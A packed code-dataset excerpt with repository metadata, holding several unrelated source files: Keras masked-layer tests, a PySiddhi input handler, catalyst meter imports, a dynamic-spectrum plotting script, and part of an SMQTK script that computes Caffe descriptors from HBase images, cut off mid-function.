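# = 1.0, recall = 2/3, and F1 = 2*1.0*(2/3)/(1.0 + 2/3) = 0.8.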
def exact_match_score(prediction, ground_truth):
"""Compute normalized exact match
From official ReCoRD eval script
"""
return normalize_answer(prediction) == normalize_answer(ground_truth)
| 29.458333 | 94 | 0.694484 |
27a967b578cd31a729c0fed37c1ffdfe1bda3c9e | 12,036 | py | Python | dual_encoder/keras_layers_test.py | Abhin02/federated | 5fd8f69284c2784b635faadfaf6c66ce843f7701 | [
"Apache-2.0"
] | 1 | 2022-03-16T02:13:39.000Z | 2022-03-16T02:13:39.000Z | dual_encoder/keras_layers_test.py | notminusone/federated | 6a709f5598450232b918c046cfeba849f479d5cb | [
"Apache-2.0"
] | null | null | null | dual_encoder/keras_layers_test.py | notminusone/federated | 6a709f5598450232b918c046cfeba849f479d5cb | [
"Apache-2.0"
] | null | null | null | # Copyright 2021, Google LLC.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from absl.testing import absltest
import tensorflow as tf
from dual_encoder import keras_layers
l2_normalize_fn = lambda x: tf.keras.backend.l2_normalize(x, axis=-1)
class KerasLayersTest(absltest.TestCase):
def test_masked_average_3d(self):
masked_average_layer = keras_layers.MaskedAverage(1)
inputs = tf.constant([
[[0.5, 0.3], [0.4, 0.1], [0.4, 0.1]],
[[0.6, 0.8], [0.5, 0.4], [0.4, 0.1]],
[[0.9, 0.4], [0.4, 0.1], [0.4, 0.1]],
[[0.9, 0.4], [0.4, 0.1], [0.4, 0.1]],
])
mask = tf.constant([[True, True, True],
[False, False, True],
[True, False, False],
[False, False, False]])
output_average = masked_average_layer.call(inputs, mask=mask)
output_mask = masked_average_layer.compute_mask(inputs, mask=mask)
expected_average = tf.constant([
[1.3 / 3, 0.5 / 3],
[0.4, 0.1],
[0.9, 0.4],
[0.0, 0.0]
])
expected_mask = None
tf.debugging.assert_near(expected_average, output_average)
self.assertEqual(expected_mask, output_mask)
def test_masked_average_4d(self):
masked_average_layer = keras_layers.MaskedAverage(2)
inputs = tf.constant([
[[[0.5, 0.3], [0.4, 0.1], [0.4, 0.1]],
[[0.6, 0.8], [0.5, 0.4], [0.4, 0.1]]],
[[[0.6, 0.8], [0.5, 0.4], [0.4, 0.1]],
[[0.6, 0.8], [0.5, 0.4], [0.4, 0.1]]],
[[[0.9, 0.4], [0.4, 0.1], [0.4, 0.1]],
[[0.6, 0.8], [0.5, 0.4], [0.4, 0.1]]],
[[[0.9, 0.4], [0.4, 0.1], [0.4, 0.1]],
[[0.6, 0.8], [0.5, 0.4], [0.4, 0.1]]],
])
mask = tf.constant([[[True, True, True], [True, False, True]],
[[False, False, True], [False, False, False]],
[[True, False, False], [True, True, True]],
[[False, False, False], [True, False, False]]])
output_average = masked_average_layer.call(inputs, mask=mask)
output_mask = masked_average_layer.compute_mask(inputs, mask=mask)
expected_average = tf.constant([
[[1.3 / 3, 0.5 / 3], [0.5, 0.45]],
[[0.4, 0.1], [0.0, 0.0]],
[[0.9, 0.4], [0.5, 1.3 / 3]],
[[0.0, 0.0], [0.6, 0.8]],
])
expected_mask = tf.constant([[True, True],
[True, False],
[True, True],
[False, True]])
tf.debugging.assert_near(expected_average, output_average)
tf.debugging.assert_equal(expected_mask, output_mask)
def test_masked_average_raises_error(self):
masked_average_layer = keras_layers.MaskedAverage(1)
inputs = tf.constant([
[[0.5, 0.3], [0.4, 0.1], [0.4, 0.1]],
[[0.6, 0.8], [0.5, 0.4], [0.4, 0.1]],
[[0.9, 0.4], [0.4, 0.1], [0.4, 0.1]],
])
mask = None
with self.assertRaises(ValueError):
masked_average_layer.call(inputs, mask=mask)
with self.assertRaises(ValueError):
masked_average_layer.compute_mask(inputs, mask=mask)
def test_masked_average_get_config(self):
masked_average_layer = keras_layers.MaskedAverage(1)
config = masked_average_layer.get_config()
self.assertEqual(config['axis'], 1)
def test_masked_reshape(self):
masked_reshape_layer = keras_layers.MaskedReshape((4, 4, 2, 1), (4, 4, 2))
inputs = tf.constant([
[[1.0], [2.0], [0.5], [0.4], [0.4], [0.1], [0.0], [0.0]],
[[0.4], [0.1], [0.0], [0.0], [0.0], [0.0], [0.6], [0.8]],
[[0.9], [0.4], [0.5], [3.0], [0.9], [0.4], [0.5], [3.0]],
[[0.0], [0.0], [0.6], [0.8], [0.4], [0.1], [0.0], [0.0]],
])
mask = tf.constant(
[[True, False, True, True, True, False, False, False],
[True, False, True, True, True, True, False, True],
[False, True, True, False, True, True, True, True],
[False, True, True, True, True, False, False, True]])
output = masked_reshape_layer.call(inputs, mask=mask)
output_mask = masked_reshape_layer.compute_mask(inputs, mask=mask)
expected_output = tf.constant([
[[[1.0], [2.0]], [[0.5], [0.4]], [[0.4], [0.1]], [[0.0], [0.0]]],
[[[0.4], [0.1]], [[0.0], [0.0]], [[0.0], [0.0]], [[0.6], [0.8]]],
[[[0.9], [0.4]], [[0.5], [3.0]], [[0.9], [0.4]], [[0.5], [3.0]]],
[[[0.0], [0.0]], [[0.6], [0.8]], [[0.4], [0.1]], [[0.0], [0.0]]],
])
expected_mask = tf.constant(
[[[True, False], [True, True], [True, False], [False, False]],
[[True, False], [True, True], [True, True], [False, True]],
[[False, True], [True, False], [True, True], [True, True]],
[[False, True], [True, True], [True, False], [False, True]]])
tf.debugging.assert_near(expected_output, output)
tf.debugging.assert_equal(expected_mask, output_mask)
def test_masked_reshape_unknown_batch_size(self):
masked_reshape_layer = keras_layers.MaskedReshape((-1, 4, 2, 1), (-1, 4, 2))
inputs = tf.constant([
[[1.0], [2.0], [0.5], [0.4], [0.4], [0.1], [0.0], [0.0]],
[[0.4], [0.1], [0.0], [0.0], [0.0], [0.0], [0.6], [0.8]],
[[0.9], [0.4], [0.5], [3.0], [0.9], [0.4], [0.5], [3.0]],
[[0.0], [0.0], [0.6], [0.8], [0.4], [0.1], [0.0], [0.0]],
])
mask = tf.constant(
[[True, False, True, True, True, False, False, False],
[True, False, True, True, True, True, False, True],
[False, True, True, False, True, True, True, True],
[False, True, True, True, True, False, False, True]])
output = masked_reshape_layer.call(inputs, mask=mask)
output_mask = masked_reshape_layer.compute_mask(inputs, mask=mask)
expected_output = tf.constant([
[[[1.0], [2.0]], [[0.5], [0.4]], [[0.4], [0.1]], [[0.0], [0.0]]],
[[[0.4], [0.1]], [[0.0], [0.0]], [[0.0], [0.0]], [[0.6], [0.8]]],
[[[0.9], [0.4]], [[0.5], [3.0]], [[0.9], [0.4]], [[0.5], [3.0]]],
[[[0.0], [0.0]], [[0.6], [0.8]], [[0.4], [0.1]], [[0.0], [0.0]]],
])
expected_mask = tf.constant(
[[[True, False], [True, True], [True, False], [False, False]],
[[True, False], [True, True], [True, True], [False, True]],
[[False, True], [True, False], [True, True], [True, True]],
[[False, True], [True, True], [True, False], [False, True]]])
tf.debugging.assert_near(expected_output, output)
tf.debugging.assert_equal(expected_mask, output_mask)
def test_masked_reshape_raises_error(self):
masked_reshape_layer = keras_layers.MaskedReshape((-1, 4, 2, 1), (-1, 4, 2))
inputs = tf.constant([
[[1.0], [2.0], [0.5], [0.4], [0.4], [0.1], [0.0], [0.0]],
[[0.4], [0.1], [0.0], [0.0], [0.0], [0.0], [0.6], [0.8]],
[[0.9], [0.4], [0.5], [3.0], [0.9], [0.4], [0.5], [3.0]],
[[0.0], [0.0], [0.6], [0.8], [0.4], [0.1], [0.0], [0.0]],
])
mask = None
with self.assertRaises(ValueError):
masked_reshape_layer.call(inputs, mask=mask)
with self.assertRaises(ValueError):
masked_reshape_layer.compute_mask(inputs, mask=mask)
def test_masked_reshape_get_config(self):
masked_reshape_layer = keras_layers.MaskedReshape((-1, 4, 2, 1), (-1, 4, 2))
config = masked_reshape_layer.get_config()
self.assertEqual(config['new_inputs_shape'], (-1, 4, 2, 1))
self.assertEqual(config['new_mask_shape'], (-1, 4, 2))
def test_embedding_spreadout_regularizer_dot_product(self):
weights = tf.constant(
[[1.0, 0.0, 0.0],
[2.0, 2.0, 2.0],
[0.1, 0.2, 0.3],
[0.3, 0.2, 0.1],
[0.0, 1.0, 0.0]])
regularizer = keras_layers.EmbeddingSpreadoutRegularizer(
spreadout_lambda=0.1,
normalization_fn=None,
l2_regularization=0.0)
# Similarities without diagonal looks like:
# 0.0 2.0 0.1 0.3 0.0
# 2.0 0.0 1.2 1.2 2.0
# 0.1 1.2 0.0 0.1 0.2
# 0.3 1.2 0.1 0.0 0.2
# 0.0 2.0 0.2 0.2 0.0
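    # Editor's note on the arithmetic: the squared off-diagonal similarities
    # above sum to 22.14, sqrt(22.14) ~= 4.7053, and multiplying by
    # spreadout_lambda = 0.1 gives the expected 0.47053161424 below (assuming
    # the regularizer computes lambda * the Frobenius norm of the off-diagonal
    # similarity matrix).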
loss = regularizer(weights)
# L2 norm of above similarities.
expected_loss = 0.47053161424
tf.debugging.assert_near(expected_loss, loss)
regularizer = keras_layers.EmbeddingSpreadoutRegularizer(
spreadout_lambda=0.1,
normalization_fn=None,
l2_regularization=1.0)
l2_regularizer = tf.keras.regularizers.l2(1.0)
loss = regularizer(weights)
expected_loss = 0.47053161424 + l2_regularizer(weights)
tf.debugging.assert_near(expected_loss, loss)
def test_embedding_spreadout_regularizer_cosine_similarity(self):
weights = tf.constant(
[[1.0, 0.0, 0.0],
[2.0, 2.0, 2.0],
[0.1, 0.2, 0.3],
[0.3, 0.2, 0.1],
[0.0, 1.0, 0.0]])
regularizer = keras_layers.EmbeddingSpreadoutRegularizer(
spreadout_lambda=0.1,
normalization_fn=l2_normalize_fn,
l2_regularization=0.0)
loss = regularizer(weights)
# L2 norm of above similarities.
expected_loss = 0.2890284
tf.debugging.assert_near(expected_loss, loss)
regularizer = keras_layers.EmbeddingSpreadoutRegularizer(
spreadout_lambda=0.1,
normalization_fn=l2_normalize_fn,
l2_regularization=1.0)
l2_regularizer = tf.keras.regularizers.l2(1.0)
loss = regularizer(weights)
expected_loss = 0.2890284 + l2_regularizer(weights)
tf.debugging.assert_near(expected_loss, loss)
def test_embedding_spreadout_regularizer_no_spreadout(self):
weights = tf.constant(
[[1.0, 0.0, 0.0],
[2.0, 2.0, 2.0],
[0.1, 0.2, 0.3],
[0.3, 0.2, 0.1],
[0.0, 1.0, 0.0]])
regularizer = keras_layers.EmbeddingSpreadoutRegularizer(
spreadout_lambda=0.0,
normalization_fn=None,
l2_regularization=0.0)
loss = regularizer(weights)
expected_loss = 0.0
tf.debugging.assert_near(expected_loss, loss)
# Test that L2 normalization behaves normally.
regularizer = keras_layers.EmbeddingSpreadoutRegularizer(
spreadout_lambda=0.0,
normalization_fn=None,
l2_regularization=0.1)
l2_regularizer = tf.keras.regularizers.l2(0.1)
loss = regularizer(weights)
l2_loss = l2_regularizer(weights)
tf.debugging.assert_near(l2_loss, loss)
# Test that normalization_fn has no effect.
regularizer = keras_layers.EmbeddingSpreadoutRegularizer(
spreadout_lambda=0.0,
normalization_fn=l2_normalize_fn,
l2_regularization=0.1)
l2_regularizer = tf.keras.regularizers.l2(0.1)
loss = regularizer(weights)
l2_loss = l2_regularizer(weights)
tf.debugging.assert_near(l2_loss, loss)
def test_embedding_spreadout_regularizer_get_config(self):
weights = tf.constant(
[[1.0, 0.0, 0.0],
[2.0, 2.0, 2.0],
[0.1, 0.2, 0.3],
[0.3, 0.2, 0.1],
[0.0, 1.0, 0.0]])
regularizer = keras_layers.EmbeddingSpreadoutRegularizer(
spreadout_lambda=0.0,
normalization_fn=l2_normalize_fn,
l2_regularization=0.1)
config = regularizer.get_config()
expected_config = {
'spreadout_lambda': 0.0,
'normalization_fn': l2_normalize_fn,
'l2_regularization': 0.1
}
new_regularizer = (
keras_layers.EmbeddingSpreadoutRegularizer.from_config(config))
l2_regularizer = tf.keras.regularizers.l2(0.1)
loss = new_regularizer(weights)
l2_loss = l2_regularizer(weights)
self.assertEqual(config, expected_config)
tf.debugging.assert_near(l2_loss, loss)
if __name__ == '__main__':
absltest.main()
| 35.821429 | 80 | 0.571868 |
716215b5f34434c9d265401560bc6fbf4dc58b53 | 1,910 | py | Python | PySiddhi/core/stream/input/InputHandler.py | localstack/PySiddhi | 8f16c5f25908aa6ff94fb3cd256c3d47b6ee3ab2 | [
"Apache-2.0"
] | 13 | 2019-03-19T11:28:59.000Z | 2022-02-22T10:52:44.000Z | PySiddhi/core/stream/input/InputHandler.py | localstack/PySiddhi | 8f16c5f25908aa6ff94fb3cd256c3d47b6ee3ab2 | [
"Apache-2.0"
] | 8 | 2019-06-18T11:56:11.000Z | 2021-08-17T11:22:58.000Z | PySiddhi/core/stream/input/InputHandler.py | localstack/PySiddhi | 8f16c5f25908aa6ff94fb3cd256c3d47b6ee3ab2 | [
"Apache-2.0"
] | 12 | 2019-05-07T01:44:53.000Z | 2021-11-12T09:26:02.000Z | # Copyright (c) 2017, WSO2 Inc. (http://www.wso2.org) All Rights Reserved.
#
# WSO2 Inc. licenses this file to you under the Apache License,
# Version 2.0 (the "License"); you may not use this file except
# in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from PySiddhi import SiddhiLoader
from PySiddhi.DataTypes.DataWrapper import wrapData
input_handler_proxy = SiddhiLoader._loadType(
"io.siddhi.pythonapi.proxy.core.stream.input.input_handler.InputHandlerProxy")
class InputHandler(object):
'''
Handles input to SiddhiAppRuntime.
Wrapper on io.siddhi.core.stream.input.InputHandler
'''
def __init__(self):
raise NotImplementedError("Initialize InputHandler using SiddhiAppRuntime")
def __new__(cls):
bare_instance = object.__new__(cls)
bare_instance.input_handler_proxy = None
return bare_instance
def send(self, data):
'''
Sends data as an event to system.
:param data:
:return:
'''
wrapped_data = wrapData(data)
input_handler_proxy_inst = input_handler_proxy()
input_handler_proxy_inst.send(self.input_handler_proxy, wrapped_data)
@classmethod
def _fromInputHandlerProxy(cls, input_handler_proxy):
'''
Internal Constructor to wrap around JAVA Class InputHandler
:param input_handler_proxy:
:return:
'''
instance = cls.__new__(cls)
instance.input_handler_proxy = input_handler_proxy
return instance
| 32.931034 | 83 | 0.708901 |
7c06fa6ec47b0fd1bf3dc954788ca4424a0c3456 | 393 | py | Python | catalyst/dl/meters/__init__.py | vaklyuenkov/catalyst | 402294aa5b27784d23cee2b8fff5a1ed26dec8a8 | [
"Apache-2.0"
] | null | null | null | catalyst/dl/meters/__init__.py | vaklyuenkov/catalyst | 402294aa5b27784d23cee2b8fff5a1ed26dec8a8 | [
"Apache-2.0"
] | null | null | null | catalyst/dl/meters/__init__.py | vaklyuenkov/catalyst | 402294aa5b27784d23cee2b8fff5a1ed26dec8a8 | [
"Apache-2.0"
] | null | null | null | # flake8: noqa
from .averagevaluemeter import AverageValueMeter
from .classerrormeter import ClassErrorMeter
from .confusionmeter import ConfusionMeter
from .msemeter import MSEMeter
from .movingaveragevaluemeter import MovingAverageValueMeter
from .aucmeter import AUCMeter
from .apmeter import APMeter
from .mapmeter import mAPMeter
from .ppv_tpr_f1_meter import PrecisionRecallF1ScoreMeter
| 35.727273 | 60 | 0.872774 |
5d415393fc3e2331e79a1aa573d38c6755d36c03 | 2,786 | py | Python | burst_paper/all_ds/plot_example_ds_with_im.py | jackievilladsen/dynspec | 87101b188d7891644d848e781bca00f044fe3f0b | [
"MIT"
] | 2 | 2019-05-01T00:34:28.000Z | 2021-02-10T09:18:10.000Z | burst_paper/all_ds/plot_example_ds_with_im.py | jackievilladsen/dynspec | 87101b188d7891644d848e781bca00f044fe3f0b | [
"MIT"
] | null | null | null | burst_paper/all_ds/plot_example_ds_with_im.py | jackievilladsen/dynspec | 87101b188d7891644d848e781bca00f044fe3f0b | [
"MIT"
] | null | null | null |
###########
# now plot just an example of ADLeo_3 with real and imaginary components
###########
import dynspec.plot
reload(dynspec.plot)
from dynspec import load_dict
from dynspec.plot import *
from pylab import *
import os, subprocess
import matplotlib.gridspec as gridspec
params = {'legend.fontsize': 'small',
'axes.titlesize': 'small',
'axes.labelsize': 'x-small',
'xtick.labelsize': 'xx-small',
'ytick.labelsize': 'xx-small',
'image.interpolation': 'none'}
rcParams.update(params)
savefile = '/data/jrv/burst_paper/all_burst_dynspec.npy'
savedir='/data/jrv/burst_paper/adleo/'
nt = 60
nf = 32
ds_files = ['/data/jrv/15A-416/ADLeo/3/L/test_clean/ds_ap0_big_RR_n2_ms/tbavg.ms.dynspec','/data/jrv/15A-416/ADLeo/3/S/test_selfcal/ds_ap1_n3_bgsub_big/tbavg.ms.dynspec']
src = 'ADLeo'
'''
ds_obs = None
for f in ds_files:
params={'filename':f,'uniform':True}
ds = Dynspec(params)
ds.spec['i'] = (ds.spec['rr']+ds.spec['ll'])/2
ds.spec['v'] = (ds.spec['rr']-ds.spec['ll'])/2
if ds_obs is None:
ds_obs = deepcopy(ds)
else:
ds_obs.add_dynspec(ds)
del ds
#ds_obs.mask_RFI(rmsfac=5.)
ds=ds_obs.bin_dynspec(nt=nt,nf=nf,mask_partial=0.9)
'''
figure(figsize=(6.5,6.5))
n_rows = 2
n_cols = 2
gs = gridspec.GridSpec(n_rows, n_cols)
ar0 = 1.0
clf()
sub_row = 1
subplots_adjust(hspace=0.2,wspace=0)
offset = 0
# flux limits
smax = percentile(real(ds.spec['i']),98)
smax = 0.015 # manual override of the percentile-based limit above
smin = -smax # make colorbar symmetric about zero to be consistent with Stokes V
# plot Stokes I real
i = offset + 0
subplot(gs[i])
pp = {'pol':'i','smin':smin,'smax':smax,'trim_mask':False,'axis_labels':['cbar','ylabel'],'ar0':ar0,'dy':0.5}
ds.plot_dynspec(plot_params=pp)
cb = gca().images[-1].colorbar
cb.remove()
gca().yaxis.set_label_coords(-0.05,-0.1)
title('Stokes I')
# plot Stokes I imag
i = offset + 1
subplot(gs[i])
pp = {'pol':'i','func':imag,'smin':smin,'smax':smax,'trim_mask':False,'axis_labels':['cbar'],'ar0':ar0}
ds.plot_dynspec(plot_params=pp)
gca().yaxis.set_visible(False)
cb = gca().images[-1].colorbar
cb.remove()
title('Imag(I)')
# plot Stokes V real
i = offset + 2
subplot(gs[i])
pp = {'pol':'v','smin':smin,'smax':smax,'trim_mask':False,'axis_labels':['cbar','xlabel'],'ar0':ar0,'dy':0.5}
ds.plot_dynspec(plot_params=pp)
#gca().yaxis.set_visible(False)
cb = gca().images[-1].colorbar
cb.remove()
gca().xaxis.set_label_coords(1.0,-0.1)
title('Stokes V')
# plot Stokes V imag
i = offset + 3
subplot(gs[i])
pp = {'pol':'v','func':imag,'smin':smin,'smax':smax,'trim_mask':False,'axis_labels':['cbar','cbar_label'],'ar0':ar0}
ds.plot_dynspec(plot_params=pp)
gca().yaxis.set_visible(False)
title('Imag(V)')
savefig(savedir+'ADLeo3_example_ds.pdf',bbox_inches='tight')
| 25.327273 | 170 | 0.666547 |
b81d6d1e98b2b6b8c8e39dd0cb73ba0b4ef2c0d4 | 16,043 | py | Python | scripts/memex/machine_run_scripts/hbase_gpu_machine/compute.py | cdeepakroy/SMQTK | ef5cec7399e9766f95ff06fe122471a51fc4b2d8 | [
"BSD-3-Clause"
] | 1 | 2021-04-10T10:51:26.000Z | 2021-04-10T10:51:26.000Z | scripts/memex/machine_run_scripts/hbase_gpu_machine/compute.py | cdeepakroy/SMQTK | ef5cec7399e9766f95ff06fe122471a51fc4b2d8 | [
"BSD-3-Clause"
] | 3 | 2021-06-08T22:19:14.000Z | 2022-03-12T00:46:44.000Z | scripts/memex/machine_run_scripts/hbase_gpu_machine/compute.py | DigitalCompanion/SMQTK | fc9404b69150ef44f24423844bc80735c0c2b669 | [
"BSD-3-Clause"
] | null | null | null | #!/usr/bin/env python
"""
Script controlling processing of "image_cache" table image content
via HBase (happybase module)
Notes:
- HBase scan doesn't return keys in order, so checkpointing based on "highest"
key completed doesn't effectively work. There is completed key skipping,
which prevents duplicate computation, but we still have to scan the whole
HBase table, which takes a while.
"""
import happybase
import jinja2
import hashlib
import logging
import mimetypes
import multiprocessing
import multiprocessing.pool
import os
import subprocess
import tempfile
from tika import detector as tika_detector
import time
from smqtk.representation.descriptor_element.local_elements import DescriptorFileElement
import smqtk.utils.bin_utils
import smqtk.utils.factors
import smqtk.utils.file_utils
HBASE_ADDRESS = '127.0.0.1' # or an actual HBase server address
HBASE_TIMEOUT = 3600000 # one hour
HBASE_TABLE = 'image_cache'
HBASE_BINARY_COL = 'image:binary'
HBASE_BATCH_SIZE = 1000
HBASE_START_KEY = '0' * 40 # SHA1 simulation
HBASE_STOP_KEY = 'F' * 40 # SHA1 simulation
HBASE_KEY_CHECKPOINT_FILEPATH = '/data/kitware/smqtk/image_cache_cnn_compute/hbase.checkpoint.txt'
CNN_BATCH_SIZE = 2000 # Total batch of images to run in an execution of the descriptor executable at a time.
CNN_GPU_BATCH_SIZE = 100 # Number of images computed on GPU at a time
CNN_EXE = "cnn_feature_extractor"
CNN_CAFFE_MODE = '/data/kitware/caffe/source/models/bvlc_reference_caffenet/bvlc_reference_caffenet.caffemodel'
CNN_IMAGE_MEAN = '/data/kitware/smqtk/caffe_models/image_net/imagenet_mean.binaryproto'
CNN_PROTOTXT_TEMPLATE_FILE = '/data/kitware/smqtk/image_cache_cnn_compute/cnn_config.prototxt.tmpl'
CNN_PROTOTXT_TEMPLATE = jinja2.Template(open(CNN_PROTOTXT_TEMPLATE_FILE).read())
# Settings for SMQTK DescriptorFileElement construction
SMQTK_DESCRIPTOR_TYPE = 'CaffeDefaultImageNet'
SMQTK_DESCRIPTOR_SAVE_DIR = "/data/kitware/smqtk/image_cache_cnn_compute/descriptors"
SMQTK_DESCRIPTOR_DIR_SPLIT = 10
# Checkpoint information
FEED_QUEUE_MAX_SIZE = CNN_BATCH_SIZE * 2
TEMP_DIR = "/dev/shm"
mt = mimetypes.MimeTypes()
VALID_TYPES = {
'image/tiff',
'image/png',
'image/jpeg',
}
def write_to_temp(img_binary):
"""
Detect binary data content type and write to tmp file using appropriate
suffix.
    :param img_binary: Image binary data as a string chunk.
:type img_binary: str
:return: Filepath to the written temp file, or None if a temp file could not be written.
:rtype: str | None
"""
log = logging.getLogger("compute.write_to_temp")
ct = tika_detector.from_buffer(img_binary)
if not ct:
log.warn("Detected no content type (None)")
return None
if ct not in VALID_TYPES:
log.warn("Invalid image type '%s'", ct)
return None
ext = mt.guess_extension(ct)
if not ext:
log.warn("Count not guess extension for type: %s", ext)
return None
fd, filepath = tempfile.mkstemp(suffix=ext, dir=TEMP_DIR)
os.close(fd)
with open(filepath, 'wb') as ofile:
ofile.write(img_binary)
return filepath
def async_write_temp((key, img_binary, out_q)):
"""
Detect binary data content type and write to tmp file using appropriate
suffix. Outputs (key, filepath) to given output Queue.
:param key: key of the element
:type key: str
    :param img_binary: Image binary data as a string chunk.
:type img_binary: str
:param out_q: Output queue.
:type out_q: multiprocessing.Queue
"""
log = logging.getLogger("compute.async_write_temp[key::%s]" % key)
ct = tika_detector.from_buffer(img_binary)
if not ct:
log.warn("Detected no content type (None)")
return
if ct not in VALID_TYPES:
log.warn("Invalid image type '%s'", ct)
return
ext = mt.guess_extension(ct)
if not ext:
log.warn("Count not guess extension for type: %s", ext)
return
sha1 = hashlib.sha1(img_binary).hexdigest()
fd, filepath = tempfile.mkstemp(suffix=ext, prefix=sha1+'.', dir=TEMP_DIR)
os.close(fd)
with open(filepath, 'wb') as ofile:
ofile.write(img_binary)
out_q.put((key, filepath))
def make_descriptor(key):
"""
Make a standard DescriptorFileElement based on the given key and current
configuration.
"""
return DescriptorFileElement(SMQTK_DESCRIPTOR_TYPE, key,
SMQTK_DESCRIPTOR_SAVE_DIR,
subdir_split=SMQTK_DESCRIPTOR_DIR_SPLIT)
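# Illustrative note: make_descriptor('<sha1 key>') yields a DescriptorFileElement that
# persists its vector under SMQTK_DESCRIPTOR_SAVE_DIR, sharding the key across
# SMQTK_DESCRIPTOR_DIR_SPLIT nested directories; the feeder and generator below rely on
# its has_vector()/set_vector() methods to skip already-computed keys and store results.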
class HBaseFeeder (multiprocessing.Process):
"""
Uses above ``HBASE_*`` configuration properties aside from key variables
which are provided to the constructor.
Scans the configured HBase table from start to stop keys, feeding to the
given queue:
(key, filepath)
pairs after writing the queries binary data to temp files.
Writes a None value to the queue when it is done scanning and will not
produce any more pairs.
TODO:
- Split out the temp file writing into a separate process in between
this and the descriptor generator process.
"""
# Number of cores to use for parallel operations, or all cores if
# set to None.
PARALLEL = None
@property
def log(self):
return logging.getLogger("compute.HBaseFeeder")
def __init__(self, start_key, stop_key, feed_queue, batch_size):
super(HBaseFeeder, self).__init__(name="HBaseFeeder")
self.start_key = start_key
self.stop_key = stop_key
self.queue = feed_queue
self.batch_size = batch_size
# HBase things
self.connection = None
self.table = None
def _new_scan_iter(self, start_key):
self.log.info("Initializing HBase connection/table/scan from key: %s", start_key)
self.connection = happybase.Connection(HBASE_ADDRESS, timeout=HBASE_TIMEOUT)
self.table = self.connection.table(HBASE_TABLE)
return self.table.scan(
row_start=start_key,
row_stop=self.stop_key,
batch_size=self.batch_size,
columns=[HBASE_BINARY_COL]
)
def run(self):
doc_batch = {}
last_key = None
i = 0
scan_iter = self._new_scan_iter(self.start_key)
running = True
while running:
key = doc = None
try:
key, doc = scan_iter.next()
except IOError:
# Expected for a scan timeout error. Re-initialize connection
self.log.warn("HBase connection timed out. Initializing new scan connection")
scan_iter = self._new_scan_iter(last_key or self.start_key)
continue
except StopIteration:
# Finished scan
self.log.info("Finished scan iteration.")
running = False
continue
except:
self.log.warn("Encountered unknown exception when trying to "
"get next key-doc pair (probably an HBase "
"issue). Reinitializing connection/scan.")
scan_iter = self._new_scan_iter(last_key or self.start_key)
continue
# Normalize hex casing
key = key.lower()
i += 1
if last_key:
assert int(key, 16) > int(last_key, 16), \
"Found an key iteration order exception: '%s' >! '%s'" \
% (key, last_key)
last_key = key
if i % self.batch_size == 0:
self.log.info("scanned %d total keys", i)
# Make a temporary DescriptorFileElement to see if this key has been computed before or not.
if make_descriptor(key).has_vector():
self.log.debug("vector with key '%s' already computed", key)
continue
binary = doc[HBASE_BINARY_COL]
if not binary:
self.log.debug("Skipping '%s', zero binary data", key)
continue
doc_batch[key] = binary
if len(doc_batch) >= self.batch_size:
self.log.info("Completed batch of %d elements from HBase, writing to files",
self.batch_size)
pool = multiprocessing.pool.ThreadPool(self.PARALLEL)
pool.map(async_write_temp, zip(*zip(*doc_batch.iteritems()) + [[self.queue]*len(doc_batch)]))
pool.close()
pool.join()
self.log.info("Cleaning up processes")
del pool, # temp_files, key, binaries
doc_batch = {}
# Write anything remaining in the batch structure
pool = multiprocessing.pool.ThreadPool(self.PARALLEL)
pool.map(async_write_temp, zip(*zip(*doc_batch.iteritems()) + [[self.queue]*len(doc_batch)]))
pool.close()
pool.join()
self.queue.put(None)
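# Queue protocol used above: the feeder puts (row_key, temp_filepath) pairs onto
# feed_queue as rows are scanned and written to TEMP_DIR, then a single None sentinel
# once the scan is exhausted; CaffeDescriptorGenerator (below) consumes pairs until it
# sees that sentinel.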
def set_descriptor(p):
"""
Create SMQTK DescriptorFileElement instance for a given descriptor vector.
Intended for use within a pool.map call, thus the tuple expansion of input.
"""
key, vector = p
e = make_descriptor(key)
e.set_vector(vector)
return e
class CaffeDescriptorGenerator (multiprocessing.Process):
"""
Compute CNN descriptors on files fed to this process via the provided
input queue. We expect (key, img_file) pairs, where key is the SHA1 hash
of the file. We output the greatest SHA1 hash of a completed batch of pairs
to the provided ``complete_queue`` queue. This hash can be used as a
checkpoint for the feeder so we don't reprocess material that we have
already finished.
"""
# Number of cores to use for parallel operations, or all if set to None
PARALLEL = None
@property
def log(self):
return logging.getLogger('compute.DescriptorGenerator')
def __init__(self, input_queue, complete_queue, batch_size, gpu_batch_size):
super(CaffeDescriptorGenerator, self).__init__(name="CaffeDescriptorGenerator")
self.in_queue = input_queue
self.complete_queue = complete_queue
self.batch_size = batch_size
self.gpu_batch_size = gpu_batch_size
def run(self):
running = True
batch = {}
while running:
try:
input = self.in_queue.get()
if input is None:
self.log.info("Received terminal message. Closing down.")
running = False
continue
key, temp_file = input
# Make a temporary DescriptorFileElement to see if this key has been computed before or not.
if make_descriptor(key).has_vector():
self.log.debug("vector with key '%s' already computed", key)
os.remove(temp_file)
continue
batch[key] = temp_file
if len(batch) >= self.batch_size:
self.process_batch(batch, self.gpu_batch_size)
self.complete_queue.put(max(batch))
batch.clear()
except IOError, ex:
self.log.warning("Failed to pull from input queue, closing down.")
running = False
if batch:
# Finish up what ever is currently in the batch
# - Pick largest factor of remaining batch size less than the
# configured GPU batch size.
gpu_b_size = \
max([f for f in smqtk.utils.factors.factors(len(batch))
if f <= self.gpu_batch_size])
self.log.info("Computing remaining batch of size %d (GPU batch: %d)",
len(batch), gpu_b_size)
self.process_batch(batch, gpu_b_size)
self.complete_queue.put(None)
def process_batch(self, batch, gpu_batch_size):
assert len(batch) % gpu_batch_size == 0, \
"GPU Batch size does not evenly divide the given computation batch"
cnn_minibatch_size = len(batch) / gpu_batch_size
keys, temp_files = zip(*batch.items())
# Write out path-list file
# - Caffe needs the trailing '0', else there will be a non-descript
# segfault.
self.log.info("Generating work file path list")
fd, list_filepath = tempfile.mkstemp(suffix='.txt', dir=TEMP_DIR)
os.close(fd)
with open(list_filepath, 'w') as ofile:
for tf in temp_files:
ofile.write('%s 0\n' % tf)
# generate prototxt configuration file
